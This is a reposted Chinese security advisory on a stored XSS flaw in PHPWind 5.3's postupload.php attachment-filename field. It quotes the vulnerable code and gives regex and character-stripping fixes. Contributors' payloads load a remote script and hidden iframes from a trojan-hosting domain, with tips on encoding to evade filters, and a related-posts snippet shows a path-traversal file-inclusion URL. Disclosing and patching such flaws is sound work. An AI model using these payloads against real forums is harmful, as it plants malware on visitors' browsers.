PHPWind论坛5.3版postupload.php附件文件名跨站脚本漏洞

最新推荐文章于 2023-03-10 14:53:18 发布
最新推荐文章于 2023-03-10 14:53:18 发布
阅读量404 收藏
点赞数
文章标签: php 数据库
原文链接:http://www.cnblogs.com/allyesno/archive/2007/06/26/796326.html
版权
注意:这只是个漏洞公告并不是通常意义的原创,因此以执行帐号发布。感谢碎片、老周、ring04h等成员的讨论。邪恶八进制信息安全团队已经将该漏洞提交给PHPWind官方。

PHPWind Forums v5.3 postupload.php Cross Site Script(XSS)
PHPWind论坛5.3版postupload.php文件跨站脚本漏洞(XSS)

漏洞产生:
require\postupload.php文件对atc_attachment_name变量过滤不严,导致跨站脚本执行漏洞,可能引起站点被嵌入恶意代码。
记忆碎片最早提供了一个测试效果:
https://i-blog.csdnimg.cn/blog_migrate/2edf042aee530e7649d8ae23c9dbf061.png
漏洞代码分析:
以下是require\postupload.php文件引起问题的源代码:
……
$source = $db_ifftp ? $db_ftpweb."/".$fileuplodeurl : $attachdir.'/'.$fileuplodeurl;
//版块id_文件名_时间.类型
if($db_ifftp){
$ftpsize=$ftp->upload($atc_attachment,$fileuplodeurl);
} elseif(!postupload($atc_attachment,$source)){
Showmsg('upload_error');
}
if(eregi("\.(gif|jpg|png|bmp|swf)$",$atc_attachment_name) && function_exists('getimagesize')){//这里只过滤了扩展名
if(!$img_size=getimagesize($source)){
$db_ifftp ? $ftp->delete($fileuplodeurl) : P_unlink($source);
Showmsg('upload_content_error');
}
if(!$db_ifftp && $attach_ext!='swf' && $db_watermark && $img_size[0]>$db_waterwidth && $img_size[1]>$db_waterheight){
if (function_exists('imagecreatefromgif') && function_exists('imagealphablending') && ($attach_ext!='gif' || function_exists('imagegif') && ($db_ifgif==2 || $db_ifgif==1 && in_array(PHP_VERSION,array('4.4.3','4.4.4','5.1.5')))) && ($db_waterimg && function_exists('imagecopymerge') || !$db_waterimg && function_exists('imagettfbbox'))){
require_once(R_P.'require/watermark.php'); ImgWaterMark($source,$db_waterpos,$db_waterimg,$db_watertext,$db_waterfont,$db_watercolor,$db_waterpct,$db_jpgquality);
}
}
}
if(eregi("\.(gif|jpg|jpeg|png|bmp|swf)$",$atc_attachment_name)){//这里只过滤了扩展名
$ifupload=1;
if(eregi("\.swf$",$atc_attachment_name)){//这里只过滤了扩展名
$type='zip';
}else{
$type='img';
}
} elseif(eregi("\.(zip|rar)$",$atc_attachment_name)){//这里只过滤了扩展名
$ifupload=3;
$type='zip';
} elseif(eregi("\.txt$",$atc_attachment_name)){//这里只过滤了扩展名
$safecheckdb = $db_ifftp ? (function_exists('file_get_contents') ? file_get_contents($source) : '') : readover($source);
if (strpos($safecheckdb,"onload")!==false && strpos($safecheckdb,"submit")!==false && strpos($safecheckdb,"post")!==false && strpos($safecheckdb,"form")!==false){
$db_ifftp ? $ftp->delete($fileuplodeurl) : P_unlink($source);
Showmsg('upload_content_error');
} else{
$ifupload=2;
$type='txt';
}
} else{
$ifupload=3;
$type='zip';
}
$size = $db_ifftp ? ceil($ftpsize/1024) : ceil(filesize("$attachdir/$fileuplodeurl")/1024);
$atc_attachment_name=addslashes($atc_attachment_name);
if($ifreplace==0){//下面已经准备提交到数据库
$db->update("INSERT INTO pw_attachs SET fid='$fid',uid='$winduid',hits=0,name='$atc_attachment_name',type='$type',size='$size',attachurl='$fileuplodeurl',needrvrc='$needrvrc',uploadtime='$timestamp',descrip='$descrip'");
$aid = $db->insert_id();
$attachs[$aid] = array(
'aid' => $aid,
'name' => stripslashes($atc_attachment_name),//取出转译斜线便于入库
'type' => $type,
'attachurl' => $fileuplodeurl,
'needrvrc' => $needrvrc,
'size' => $size,
'hits' => 0,
'desc' => str_replace('\\','',$descrip)
);
} else {
$aid=$replacedb[$i]['aid'];
$db->update("UPDATE pw_attachs SET name='$atc_attachment_name',type='$type',size='$size',attachurl='$fileuplodeurl',needrvrc='$needrvrc',uploadtime='$timestamp',descrip='$descrip' WHERE aid='$aid'");
$oldattach[$aid]['name']=$atc_attachment_name;
$oldattach[$aid]['type']=$type;
$oldattach[$aid]['size']=$size;
}
}
……
可以看到postupload.php文件没有对atc_attachment_name这个变量提交的名字进行过滤。

漏洞测试:
只要在附件提交的地址框(不是描述框)填写精心构造的恶意跨站脚本即可实现跨站测试,可被别有用心者用来挂马等。
测试方法一 下面是zhouzhen提供的测试代码加图片:

老周的代码明文内容如下:
D:\zhouzhen<img src=http://forum.eviloctal.com/p_w_picpath/wind/logo.png>XXS.rar
https://i-blog.csdnimg.cn/blog_migrate/35039abfab9b5dae77146bf2926f9670.png
因为不能出现//等字符,可以采用ASSIC编码,将可以嵌入恶意脚本。

临时修补:
修补方法一 正则表达式:
在源文件的代码151行后(也就是上面代码块的45行后),也就是在MySQL的查询被执行之前,做一次最后的文件名过滤。
if(isset($atc_attachment_name)){
if(!eregi("^[_a-z0-9-]+\.(gif|jpg|jpeg|png|bmp|zip|rar|gz|tgz|7z)$",$atc_attachment_name)){//扩展名允许规则请根据自己站点的情况自行更改
echo "EST Name Fail!";
exit;
}
}
修补方法二 字符串替换:
临时解决跨站问题可以过滤掉尖括号符号,使脚本无法构成。
修改源文件的代码157行(也就是上面代码块的51行)为如下代码:
$atc_attachment_name = stripslashes(str_replace("<","",$atc_attachment_name));

ring04h:
在附件处填写:
D:\ring04h:<SCRIPT SRC=http://www.diaonilaomu.com/x.js>XSS.rar
转换为ASSIC编码POST:
https://i-blog.csdnimg.cn/blog_migrate/36864e2e79a70d75c092088ae21a77a3.png
黑病毒:
不用远程调用JS文件,也可以直接达到挂马的效果如下
本地测试环境:phpwind5.0.1
D:\zhouzhen<iframe src=http://www.muma.com/><%2Fiframe>XXS.rar

D:\zhouzhen<iframe src=http://www.muma.com/test.htm width=0 height=0><%2Fiframe>XXS.rar
过滤了/和",构造语句如上。
http://www.muma.com/test.htm 十六进制编码即可

转载于:https://www.cnblogs.com/allyesno/archive/2007/06/26/796326.html

weixin_30306905
关注
phpwind Exp 漏洞利用
10-30
phpwind Exp 漏洞利用
PHPWind论坛5.3postupload.php附件文件名跨站脚本漏洞(XSS)
weixin_34292924的博客
06-26 206
文章作者:EvilOctal [E.S.T]信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])注意:这只是个漏洞公告并不是通常意义的原创,因此以执行帐号发布。感谢碎片、老周、ring04h等成员的讨论。邪恶八进制信息安全团队已经将该漏洞提交给PHPWind官方。PHPWind Forums v5.3 postupload.php Cr...
PHPWind7.5多个文件包含漏洞的exploit
lvming404的专栏
02-23 2006
尝试发送以下URL,能实现本地文件包含渗透。http://10.20.61.88/phpWind7.5/pw_api.php?type=uc&sig=8c6e45dcfae660037c05f0cd1a15695b&mode=../../../../../../../../test.txt%00http://10.20.61.88/phpWind7.5/pw_api.php?type=uc
php 获取远程代码执行,Phpwind远程任意代码执行漏洞
weixin_42713608的博客
03-29 318
### 简要描述:Phpwind对于某些用户提交的参数过滤不严,导致可能的一个远程代码执行,普通前台恶意用户可以取得使用phpwind站点的权限### 详细说明:./phpwind7.2/thread.php中```InitGP(array('page','type','search','orderway','asc','special'));…… //此处省略X行$db_maxpage &amp...
PHPWind超级漏洞简单用
weixin_34356138的博客
10-24 518
题目:PHPWind超级漏洞简单用 文章作者:hackest [H.S.T]&[L.S.T]&[E.S.T] 此文章已发表在《***X档案》第5期杂志上 后经本文作者hackest提交到邪恶八进制论坛 欢迎大家转载,但请务必要记住注明此信息! 一、山雨欲来风满楼 近来创办了"十六进制"安全论坛,用的程序是PHPWind5.3,那天早上我正在...
phpwind 4.3.2远程ftp上传附件功能(附件存另一个服务器)
04-14
job.php,read.php,show.php,setforum.phppostupload.php,template.php,setforum.htm 1. 数据库升级 进入phpMyAdmin -> SQL 下运行下面升级 ALTER TABLE `pw_forums` ADD `remoteftp` INT( 3 ) UNSIGNED ...
phpwind 4.3.2 单独增加数据库分卷分表功能
04-14
'bbs_open'=>'由于数据操作较大,请关闭论坛后,继续操作!', 'table_change'=>"数据转移中,请稍侯... 正在处理第 $tstart 到 $end 条帖子!", 'table_same'=>'请选择不同的数据表进行操作!', 'only_numeric'=>'...
AFNetworking实现POST上传文件——图片、.json、MP4,,,,,等各种类型。
11-01 8875
导入AFNetworking框架后,使用步骤如下: 第一步:获取上传网址。如下所示:NSString *url = @"http://127.0.0.1/post/upload.php"; 第二步:新建AFHTTPRequestOperationManager对象,具体如下: AFHTTPRequestOperationManager *manager = [AFHTTPRequest
附件图片水印插件
12-27
136本请用postupload.php就可以了 将目录下的文件拷贝到require目录下覆盖就行了。。 支持jpg gif png 三种格式的水印,需要GD库的支持。。 生成的水印文字在postupload文件中有说明,因中文需要...
phpwindexp.php,网络编程phpwind Exp 漏洞利用
weixin_28871645的博客
03-22 191
网络编程phpwind Exp 漏洞利用广告忘记什么时候我就拿到了,一直没发挥.由于某些原因一直没发出来,毕竟不是原创,现在有人帖出来了,我也放出来.程序代码print_r("+------------------------------------------------------------------+ExploitForPhpwind5.XVersionBYLoveshell...
PHP又有重大漏洞,PHPWind重大漏洞 大量论坛被夺管理权
weixin_34135138的博客
04-02 495
4月6日傍晚,PHPWind论坛系统漏洞在互联网上爆发,一时间,众多站点开始提供此系统漏洞的恶意攻击工具,大量站点被恶性入侵并删除数据,后台管理员密码无法登陆。大旗、BTCHINA等站点进行关闭修复,而有站点则被删除十万以上数据。今天官方网站论坛又遭到了DDOS攻击。据PHPWind官方表示,PHPWind作为国内被广泛应用的BBS系统程序,在国内互联网中,几乎约占1/3的站点在同时使用该程序,显...
phpwind漏洞与修复方
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-10 508
phpwind漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作。 phpwind9.0一拖再拖终于发布了,看起来很NB的样子,但是其实是谁用谁知道 ,各种bug满天飞,各种报错…这个就是一例,通杀型…,官方不修复,我自己用着新本蛋疼啊.. 签到的时候,在自定义我想说的地方,写几个引号,然后就杯具了..提交后,直接报出绝对路径..
PHP漏洞全解(三)-xss跨站脚本攻击
稻草人技术博客
12-11 2118
本文主要介绍针对PHP网站的xss跨站脚本攻击。跨站脚本攻击是通过在网页中加入恶意代码,当访问者浏览网页时恶意代码会被执行或者通过给管理员发信息 的方式诱使管理员浏览,从而获得管理员权限,控制整个网站。攻击者利用跨站请求伪造能够轻松地强迫用户的浏览器发出非故意的HTTP请求,如诈骗性的电汇 请求、修改口令和下载非法的内容等请求。XSS(Cross Site Scripting),意为跨网站脚本攻击,
修改密码PHP博客,phpwind任意修改管理员密码漏洞
weixin_31510505的博客
03-27 529
漏洞说明:PHPWind 论坛系统 是一套采用 php+mysql 数据库方式运行并可生成 html 页面的全新且完善的强大系统。因具有非凡的访问速度和卓越的负载能力而深受国内外朋友的喜爱。但是80sec在其中发现了一个安全漏洞,成功利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限。漏洞厂商:http://www.phpwind.net漏洞来源:http://www.80sec.com/...
php漏洞论坛,PHPWind超级漏洞简单用
weixin_42412910的博客
03-20 1989
题目:PHPWind超级漏洞简单用文章作者:hackest [H.S.T]&[L.S.T]&[E.S.T]此文章已发表在《***X档案》第5期杂志上后经本文作者hackest提交到邪恶八进制论坛欢迎大家转载,但请务必要记住注明此信息!一、山雨欲来风满楼近来创办了"十六进制"安全论坛,用的程序是PHPWind5.3,那天早上我正在管理自己的论坛,发现有人在发广告,禁言了他之后,就去删...
php5.1 0day,关于phpwind 5.01-5.3 0day的分析
weixin_28689729的博客
03-26 280
Ph4nt0m]Re:Anotherphpwind5.x0dayph4nt0m@googlegroups.com今天要luoluo牛抓了下包,这个漏洞挺牛的:)passport_client.php里变量没有初始化可以绕过那些判断:if(!$passport_ifopen||$passport_type!=’client’){exit("Passportclosed(PHP...
php最大的论坛,phpwind论坛史上最大漏洞 -电脑资料
weixin_31131927的博客
03-12 1018
发表于家用电脑2007年第19期文/图:飘忽不定就在最近的一个月,国内的一些著名论坛相继被黑,而这些论坛采用的基本都是PHPwind论坛系统,管理员密码,而入侵的过程仅仅只需要十几秒种。截至目前,国内大约有1/3采用PHPwind论坛程序的网站被黑,无数网站被恶意挂马、篡改甚至直接删除数据。而目前,网络上仍然存在不少没有填补该漏洞的网站。本文将为大家揭开此次事件的真相,并给广大站长以及个人建站爱好...
JS web 手机端上传图片 VB.net后端
最新发布
10-04
在JavaScript Web应用中,手机端上传图片通常涉及前端HTML5的File API,配合FormData或axios等库来发送POST请求到VB.NET后端。步骤如下: 1. **前端**: - 使用<input type="file">元素让用户选择图片,这触发了一个浏览器事件(通常是change事件)。 - 通过FileReader读取选中的图片文件,将其转化为Blob对象。 - 创建一个新的FormData对象,添加Blob对象作为键值对(`formData.append('image', blob)`)。 - 发送POST请求到服务器,比如使用fetch API或axios库,设置请求头Content-Type为'multipart/form-data'。 ```javascript let input = document.getElementById('imgInput'); input.addEventListener('change', function(e) { let file = e.target.files[0]; let formData = new FormData(); formData.append('image', file); fetch('/upload', { method: 'POST', body: formData, headers: { 'Content-Type': 'multipart/form-data' } }).then(response => response.json()); }); ``` 2. **后端** (VB.NET): - 接收这个POST请求,可以创建一个控制器处理图片上传,如ASP.NET MVC或Web API。 - 解析传来的multipart/form-data数据,获取到Blob对象,然后保存到数据库或临时文件系统。 ```vb.net Imports System.IO Imports Microsoft.AspNetCore.Mvc Public Class UploadController : Controller Public Function PostUpload(file As IFormFile) As ActionResult If file.ContentType.StartsWith("image/") Then Dim filePath = Path.GetTempFileName() Using stream = New FileStream(filePath, FileMode.Create) file.CopyTo(stream) ' 这里你可以进一步处理文件,比如存储到数据库 End Using Return Ok() Else Return BadRequest("Invalid file type") End If End Function End Class ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值